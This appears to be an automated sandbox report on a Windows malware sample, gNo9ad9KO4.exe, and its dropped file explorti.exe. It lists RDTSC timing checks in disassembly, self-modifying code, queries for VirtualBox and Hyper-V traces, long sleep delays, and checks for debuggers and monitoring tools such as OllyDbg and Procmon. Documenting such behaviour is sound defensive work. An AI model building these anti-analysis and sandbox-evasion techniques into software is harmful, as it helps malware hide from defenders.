Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5410D15 second address: 5410D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420E07 second address: 5420E7C instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, A6D2h 0x00000010 jmp 00007F4688C929E3h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov eax, 19CD9A0Bh 0x0000001d jmp 00007F4688C929E0h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C929DEh 0x0000002c sbb ecx, 077A3348h 0x00000032 jmp 00007F4688C929DBh 0x00000037 popfd 0x00000038 mov dx, si 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C929DCh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420E7C second address: 5420E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420E82 second address: 5420E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420BBC second address: 5420BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420BE6 second address: 5420BFA instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, cx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, 7Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420BFA second address: 5420C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420C24 second address: 5420C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2A4Ah 0x00000007 mov bh, A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929E9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420C4D second address: 5420C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420C5D second address: 5420C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420C61 second address: 5420C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5420C76 second address: 5420C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A0682 second address: 54A0686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A0686 second address: 54A068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A068A second address: 54A0690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A0690 second address: 54A0696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A0696 second address: 54A069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A069A second address: 54A06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4688C929DEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A06D2 second address: 54A06D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A06D8 second address: 54A06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A06DC second address: 54A070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C1B779h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B76Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54A070F second address: 54A071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54909F3 second address: 5490A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B779h 0x0000000b and cx, 6646h 0x00000010 jmp 00007F4688C1B771h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5490A33 second address: 5490A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5490A39 second address: 5490A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, BBh 0x0000000c mov bx, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 movsx edi, cx 0x00000016 pop ecx 0x00000017 mov al, dl 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4688C1B779h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5430271 second address: 5430277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5430277 second address: 543027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 543027B second address: 543028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 543028A second address: 543028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 543028E second address: 5430294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5490CDA second address: 5490D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A7h 0x00000005 mov esi, 3B3E9733h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F4688C1B776h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F4688C1B770h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d jmp 00007F4688C1B770h 0x00000022 push dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B76Eh 0x0000002c add cx, 4CC8h 0x00000031 jmp 00007F4688C1B76Bh 0x00000036 popfd 0x00000037 mov ah, 22h 0x00000039 popad 0x0000003a push 5DF8A268h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C1B777h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5490D68 second address: 5490D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5DF9A26Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929DDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5490D9B second address: 5490DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5490DDF second address: 5490DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440501 second address: 5440505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440505 second address: 544050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 544050B second address: 544056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C1B770h 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F4688C1B770h 0x00000017 push 09B2C9E3h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4688C1B76Dh 0x00000025 or ax, 3506h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 544056E second address: 54405B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 7F4B09FBh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C929DDh 0x00000018 and cx, 7D16h 0x0000001d jmp 00007F4688C929E1h 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edi, ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54405B4 second address: 54405FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call 00007F4688C1B769h 0x0000000f jmp 00007F4688C1B770h 0x00000014 push eax 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4688C1B76Bh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54405FB second address: 5440618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440618 second address: 544061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 544061F second address: 544065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b call 00007F4688C929DBh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 call 00007F4688C929E6h 0x00000017 push eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 544065B second address: 544065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 544065F second address: 5440665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440665 second address: 54406A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F4688C1B770h 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B777h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54406A9 second address: 54406AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54406AF second address: 54406B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54406B3 second address: 544078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov esi, edi 0x00000015 pushfd 0x00000016 jmp 00007F4688C929DDh 0x0000001b or al, FFFFFFC6h 0x0000001e jmp 00007F4688C929E1h 0x00000023 popfd 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007F4688C929DEh 0x0000002b sub esp, 1Ch 0x0000002e pushad 0x0000002f pushad 0x00000030 mov cl, 1Ch 0x00000032 pushfd 0x00000033 jmp 00007F4688C929E9h 0x00000038 sub cx, 4586h 0x0000003d jmp 00007F4688C929E1h 0x00000042 popfd 0x00000043 popad 0x00000044 pushfd 0x00000045 jmp 00007F4688C929E0h 0x0000004a add cx, 8828h 0x0000004f jmp 00007F4688C929DBh 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F4688C929E6h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 544078C second address: 5440792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440792 second address: 54407E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F4688C929E6h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F4688C929E6h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F4688C929DCh 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54407E9 second address: 54407F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bl 0x00000008 popad 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54407F8 second address: 5440837 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 34ED4AA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4688C929E5h 0x00000014 adc eax, 5B01D476h 0x0000001a jmp 00007F4688C929E1h 0x0000001f popfd 0x00000020 mov ch, 0Fh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440837 second address: 5440854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B779h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 5440854 second address: 54408C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F4688C929DDh 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 jmp 00007F4688C929DEh 0x00000018 xor dword ptr [ebp-08h], eax 0x0000001b pushad 0x0000001c mov eax, 544A8F7Dh 0x00000021 call 00007F4688C929DAh 0x00000026 push eax 0x00000027 pop edi 0x00000028 pop ecx 0x00000029 popad 0x0000002a xor eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4688C929DFh 0x00000035 jmp 00007F4688C929E3h 0x0000003a popfd 0x0000003b push ecx 0x0000003c pop edx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 54408C0 second address: 54408EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F4688C1B76Ch 0x0000000c sub esi, 3667A318h 0x00000012 jmp 00007F4688C1B76Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 1CEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 1CEEFF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 363775 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 38FF78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 1CEDF9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 3F3B3C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: EFEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: EFEEFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1093775 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 10BFF78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: EFEDF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1123B3C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Code function: 0_2_05490C90 rdtsc 0_2_05490C90
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 364
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8184 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156 Thread sleep count: 364 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156 Thread sleep time: -10920000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5924 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8176 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000007.00000002.2880581504.0000000000729000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: gNo9ad9KO4.exe, 00000000.00000002.1680292366.0000000000344000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1706138398.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1720919181.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Code function: 0_2_05490C90 rdtsc 0_2_05490C90
